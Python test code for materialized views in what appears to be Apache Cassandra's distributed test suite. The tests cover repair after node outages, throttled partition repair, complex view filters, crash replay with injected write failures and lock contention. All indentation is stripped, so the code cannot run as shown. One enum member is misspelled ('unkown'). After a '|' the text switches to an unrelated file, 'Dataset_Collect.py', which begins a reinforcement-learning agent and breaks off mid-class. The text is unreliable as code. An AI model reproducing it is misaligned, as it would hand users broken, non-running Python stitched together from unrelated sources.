node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
logger.debug('Verify that there is no data on node1')
for i in range(1000):
assert_none(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i)
)
logger.debug('Restarting node2 and node3')
node2.start(wait_for_binary_proto=True)
node3.start(wait_for_binary_proto=True)
# Just repair the base replica
logger.debug('Starting repair on node1')
node1.nodetool("repair ks t")
logger.debug('Verify data with cl=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
@pytest.mark.resource_intensive
def test_complex_repair(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
"WITH gc_grace_seconds = 5")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop()
node3.stop(wait_other_notice=True)
logger.debug('Write initial data to node1 (will be replicated to node4 and node5)')
for i in range(1000):
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
logger.debug('Verify the data in the MV on node1 with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Close connection to node1')
session.cluster.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
for i in range(1000):
assert_none(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
)
logger.debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
for i in range(1000):
# we write i*2 as value, instead of i
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
logger.debug('Verify the new data in the MV on node2 with CL=ONE')
for i in range(1000):
v = i * 2
assert_one(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0]
)
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
logger.debug('Read data from MV at QUORUM (old data should be returned)')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
logger.debug('Read data from MV at quorum (new data should be returned after repair)')
for i in range(1000):
v = i * 2
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
@pytest.mark.resource_intensive
def test_throttled_partition_update(self):
"""
@jira_ticket: CASSANDRA-13299, test break up large partition when repairing base with mv.
Provide a configuable batch size(cassandra.mv.mutation.row.count=100) to trottle number
of rows to be applied in one mutation
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
session.execute("CREATE TABLE ks.t (pk int, ck1 int, ck2 int, v1 int, v2 int, PRIMARY KEY(pk, ck1, ck2))")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE pk IS NOT NULL AND ck1 IS NOT NULL AND ck2 IS NOT NULL "
"PRIMARY KEY (pk, ck2, ck1)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
size = 50
range_deletion_ts = 30
partition_deletion_ts = 10
for ck1 in range(size):
for ck2 in range(size):
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (1, {}, {}, {}, {}) USING TIMESTAMP {}".format(ck1, ck2, ck1, ck2, ck1))
self._replay_batchlogs()
for ck1 in range(size):
for ck2 in range(size):
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
logger.debug('Shutdown node4 and node5')
node4.stop(wait_other_notice=True)
node5.stop(wait_other_notice=True)
for ck1 in range(size):
for ck2 in range(size):
if ck1 % 2 == 0: # range tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 50 WHERE pk=1 AND ck1={}".format(ck1))
elif ck1 == ck2: # row tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 60 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
session.execute("DELETE v2 FROM ks.t USING TIMESTAMP 70 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
# range deletion
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 < 30 and ck1 > 20".format(range_deletion_ts))
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 = 20 and ck2 < 10".format(range_deletion_ts))
# partition deletion for ck1 <= partition_deletion_ts
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1".format(partition_deletion_ts))
# only partition deletion for the pk=2000
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=2000".format(partition_deletion_ts))
self._replay_batchlogs()
# start nodes with different batch size
logger.debug('Starting nodes')
node2.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(2)])
node3.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5)])
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(50)])
node5.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5000)])
self._replay_batchlogs()
logger.debug('repairing base table')
node1.nodetool("repair ks t")
# insert data to the deleted partition with pk=2000, they should be considered dead
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (2000, 0, 0, 0, 0) USING TIMESTAMP {}".format(partition_deletion_ts - 1))
self._replay_batchlogs()
logger.debug('stop cluster')
self.cluster.stop()
logger.debug('rolling restart to check repaired data on each node')
for node in self.cluster.nodelist():
logger.debug('starting {}'.format(node.name))
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
for ck1 in range(size):
for ck2 in range(size):
if (
ck1 <= partition_deletion_ts or # partition deletion
ck1 == ck2 or ck1 % 2 == 0 or # row deletion or range tombstone
(ck1 > 20 and ck1 < 30) or (ck1 == 20 and ck2 < 10) # range tombstone
):
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
else:
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
# Verify partition deletion with pk=2000 has no live data
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=2000")
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=2000")
logger.debug('stopping {}'.format(node.name))
node.stop(wait_other_notice=True, wait_for_binary_proto=True)
@pytest.mark.resource_intensive
def test_really_complex_repair(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
"WITH gc_grace_seconds = 1")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
"v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
session.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
session2.execute('USE ks')
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
logger.debug('Write new data in node2 that overlap those in node1')
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
logger.debug("Composite delete of everything")
session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
self._replay_batchlogs()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
# at this point the data isn't repaired so we have an inconsistency.
# this value should return None
assert_all(
session2,
"SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def test_complex_mv_select_statements(self):
"""
Test complex MV select statements
@jira_ticket CASSANDRA-9664
"""
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
logger.debug("Creating keyspace")
session.execute("CREATE KEYSPACE mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
session.execute('USE mvtest')
mv_primary_keys = ["((a, b), c)",
"((b, a), c)",
"(a, b, c)",
"(c, b, a)",
"((c, a), b)"]
for mv_primary_key in mv_primary_keys:
session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
session.cluster.control_connection.wait_for_schema_agreement()
rows = [(0, 0, 0, 0),
(0, 0, 1, 0),
(0, 1, 0, 0),
(0, 1, 1, 0),
(1, 0, 0, 0),
(1, 0, 1, 0),
(1, 1, -1, 0),
(1, 1, 0, 0),
(1, 1, 1, 0)]
for row in rows:
session.execute(insert_stmt, row)
logger.debug("Testing MV primary key: {}".format(mv_primary_key))
session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
"a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
time.sleep(3)
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new rows that does not match the filter
session.execute(insert_stmt, (0, 0, 1, 0))
session.execute(insert_stmt, (1, 1, 0, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new row that does match the filter
session.execute(insert_stmt, (1, 2, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update rows that does not match the filter
session.execute(update_stmt, (1, 1, -1, 0))
session.execute(update_stmt, (0, 1, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update a row that does match the filter
session.execute(update_stmt, (2, 1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete rows that does not match the filter
session.execute(delete_stmt1, (1, 1, -1))
session.execute(delete_stmt1, (2, 0, 1))
session.execute(delete_stmt2, (0,))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a row that does match the filter
session.execute(delete_stmt1, (1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a partition that matches the filter
session.execute(delete_stmt2, (1,))
assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
# Cleanup
session.execute("DROP MATERIALIZED VIEW mv")
session.execute("DROP TABLE test")
def propagate_view_creation_over_non_existing_table(self):
"""
The internal addition of a view over a non existing table should be ignored
@jira_ticket CASSANDRA-13737
"""
cluster = self.cluster
cluster.populate(3)
cluster.start()
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
create_ks(session, 'ks', 3)
session.execute('CREATE TABLE users (username varchar PRIMARY KEY, state varchar)')
# create a materialized view only in nodes 1 and 2
node3.stop(wait_other_notice=True)
session.execute(('CREATE MATERIALIZED VIEW users_by_state AS '
'SELECT * FROM users WHERE state IS NOT NULL AND username IS NOT NULL '
'PRIMARY KEY (state, username)'))
# drop the base table only in node 3
node1.stop(wait_other_notice=True)
node2.stop(wait_other_notice=True)
node3.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node3, consistency_level=ConsistencyLevel.QUORUM)
session.execute('DROP TABLE ks.users')
# restart the cluster
cluster.stop()
cluster.start()
# node3 should have received and ignored the creation of the MV over the dropped table
assert node3.grep_log('Not adding view users_by_state because the base table')
def test_base_view_consistency_on_failure_after_mv_apply(self):
self._test_base_view_consistency_on_crash("after")
def test_base_view_consistency_on_failure_before_mv_apply(self):
self._test_base_view_consistency_on_crash("before")
def _test_base_view_consistency_on_crash(self, fail_phase):
"""
* Fails base table write before or after applying views
* Restart node and replay commit and batchlog
* Check that base and views are present
@jira_ticket CASSANDRA-13069
"""
self.cluster.set_batch_commitlog(enabled=True)
self.fixture_dtest_setup.ignore_log_patterns = [r'Dummy failure', r"Failed to force-recycle all segments"]
self.prepare(rf=1, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Make node1 fail {} view writes'.format(fail_phase))
node1.byteman_submit(['./byteman/fail_{}_view_write.btm'.format(fail_phase)])
logger.debug('Write 1000 rows - all node1 writes should fail')
failed = False
for i in range(1, 1000):
try:
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) USING TIMESTAMP {v}".format(v=i))
except WriteFailure:
failed = True
assert failed, "Should fail at least once."
assert node1.grep_log("Dummy failure"), "Should throw Dummy failure"
missing_entries = 0
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
if not base_entry:
missing_entries += 1
if not view_entry:
missing_entries += 1
logger.debug("Missing entries {}".format(missing_entries))
assert missing_entries > 0
logger.debug('Restarting node1 to ensure commit log is replayed')
node1.stop(wait_other_notice=True)
# Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
node1.start(jvm_args=["-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug('Verify that both the base table entry and view are present after commit and batchlog replay')
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
assert base_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
assert view_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
# For read verification
class MutationPresence(Enum):
match = 1
extra = 2
missing = 3
excluded = 4
unknown = 5
class MM(object):
mp = None
def out(self):
pass
class Match(MM):
def __init__(self):
self.mp = MutationPresence.match
def out(self):
return None
class Extra(MM):
expecting = None
value = None
row = None
def __init__(self, expecting, value, row):
self.mp = MutationPresence.extra
self.expecting = expecting
self.value = value
self.row = row
def out(self):
return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
value = None
row = None
def __init__(self, value, row):
self.mp = MutationPresence.missing
self.value = value
self.row = row
def out(self):
return "Missing. At {}".format(self.row)
class Excluded(MM):
def __init__(self):
self.mp = MutationPresence.excluded
def out(self):
return None
class Unknown(MM):
def __init__(self):
self.mp = MutationPresence.unknown
def out(self):
return None
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
return SimpleRow(a=i % num_partitions, b=(i % 400) // num_partitions, c=i, d=i)
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
def execute_query(session, select_gi, i):
row = row_generate(i, num_partitions)
if (row.a, row.b) in rows:
base = rows[(row.a, row.b)]
else:
base = -1
gi = list(session.execute(select_gi, [row.c, row.a]))
if base == i and len(gi) == 1:
return Match()
elif base != i and len(gi) == 1:
return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
elif base == i and len(gi) == 0:
return Missing(base, i)
elif base != i and len(gi) == 0:
return Excluded()
else:
return Unknown()
try:
cluster = Cluster([ip])
session = cluster.connect()
select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
select_gi.consistency_level = readConsistency
for i in range(start, end):
ret = execute_query(session, select_gi, i)
queue.put_nowait(ret)
except Exception as e:
print(str(e))
queue.close()
@since('3.0')
@pytest.mark.skipif(sys.platform == 'win32', reason='Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
logger.debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in list(self.exception_type.keys()):
output = "{} ({}: {})".format(output, key, self.exception_type[key])
logger.debug(output)
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
self.counts[MutationPresence.unkown])
)
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print(traceback.format_exception_only(type(e), e))
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async_ret = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async_ret.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
@pytest.mark.skip(reason='awaiting CASSANDRA-11290')
def test_single_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def test_multi_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a multiple partitions
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(5)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
node1, node2, node3 = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) // processes
logger.debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
logger.debug("Writing data to base table")
for i in range(upper // 10):
self._do_row(insert1, i, num_partitions)
logger.debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug("Writing more data to base table")
for i in range(upper // 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
logger.debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
logger.debug("Finished writes, now verifying reads")
self._populate_rows()
threads = []
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = get_ip_from_node(node2)
t = threading.Thread(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
threads.append(t)
t.daemon = True
t.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
try:
mm = queues[i % processes].get(timeout=60)
except Empty as e:
pytest.skip("Failed to get range {range} within timeout from queue. {error}".format(range=i, error=str(e)))
if not mm.out() is None:
logger.debug("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
for thread in threads:
thread.join(timeout=300)
@since('3.0')
class TestMaterializedViewsLockcontention(Tester):
"""
Test materialized views lock contention.
@jira_ticket CASSANDRA-12689
@since 3.0
"""
def _prepare_cluster(self):
self.cluster.populate(1)
self.cluster.set_configuration_options({'enable_materialized_views': 'true'})
self.supports_v5_protocol = self.supports_v5_protocol(self.cluster.version())
self.protocol_version = 5 if self.supports_v5_protocol else 4
self.cluster.set_configuration_options(values={
'concurrent_materialized_view_writes': 1,
'concurrent_writes': 1,
})
self.nodes = list(self.cluster.nodes.values())
self.cluster.start(jvm_args=[
"-Dcassandra.test.fail_mv_locks_count=64"
])
session = self.patient_exclusive_cql_connection(self.nodes[0], protocol_version=self.protocol_version)
keyspace = "locktest"
session.execute("""
CREATE KEYSPACE IF NOT EXISTS {}
WITH replication = {{ 'class': 'SimpleStrategy', 'replication_factor': '1' }}
""".format(keyspace))
session.set_keyspace(keyspace)
session.execute(
"CREATE TABLE IF NOT EXISTS test (int1 int, int2 int, date timestamp, PRIMARY KEY (int1, int2))")
session.execute("""CREATE MATERIALIZED VIEW test_sorted_mv AS
SELECT int1, date, int2
FROM test
WHERE int1 IS NOT NULL AND date IS NOT NULL AND int2 IS NOT NULL
PRIMARY KEY (int1, date, int2)
WITH CLUSTERING ORDER BY (date DESC, int2 DESC)""")
return session
@since('3.0')
def test_mutations_dontblock(self):
session = self._prepare_cluster()
records = 100
records2 = 100
params = []
for x in range(records):
for y in range(records2):
params.append([x, y])
execute_concurrent_with_args(
session,
session.prepare('INSERT INTO test (int1, int2, date) VALUES (?, ?, toTimestamp(now()))'),
params
)
assert_one(session, "SELECT count(*) FROM test WHERE int1 = 1", [records2])
for node in self.nodes:
with JolokiaAgent(node) as jmx:
mutationStagePending = jmx.read_attribute(
make_mbean('metrics', type="ThreadPools", path='request', scope='MutationStage', name='PendingTasks'), "Value"
)
assert 0 == mutationStagePending, "Pending mutations: {}".format(mutationStagePending)
|
Dataset_Collect.py | import base64
import copy
import datetime as dt
import io
import os
import random
import socket
import sys
import threading
import time
from collections import deque
from net_builder import Data_dim_reduce as build_model
import numpy as np
import skimage
import torch
from torch.autograd import Variable
from PIL import Image
from skimage import color, exposure, transform
import cv2
EPISODES = 500
img_rows, img_cols = 80, 80
# Convert image into gray scale
# We stack 8 frames, 0.06*8 sec
img_channels = 4
unity_Block_size = 65536
# PATH_MODEL = 'C:/dl_data/Python_Project/save_model/'
# PATH_LOG = 'C:/dl_data/Python_Project/train_log/'
PATH_MODEL = 'save_Model'
PATH_LOG = 'train_Log'
PATH_DATASET = 'dataSet_image'
time_Feature = round(time.time())
random_index = np.random.permutation(img_channels)
Data_Collect = True
class DQNAgent:
def __init__(self, state_size, action_size, device_):
self.t = 0
self.max_Q = 0
self.trainingLoss = 0
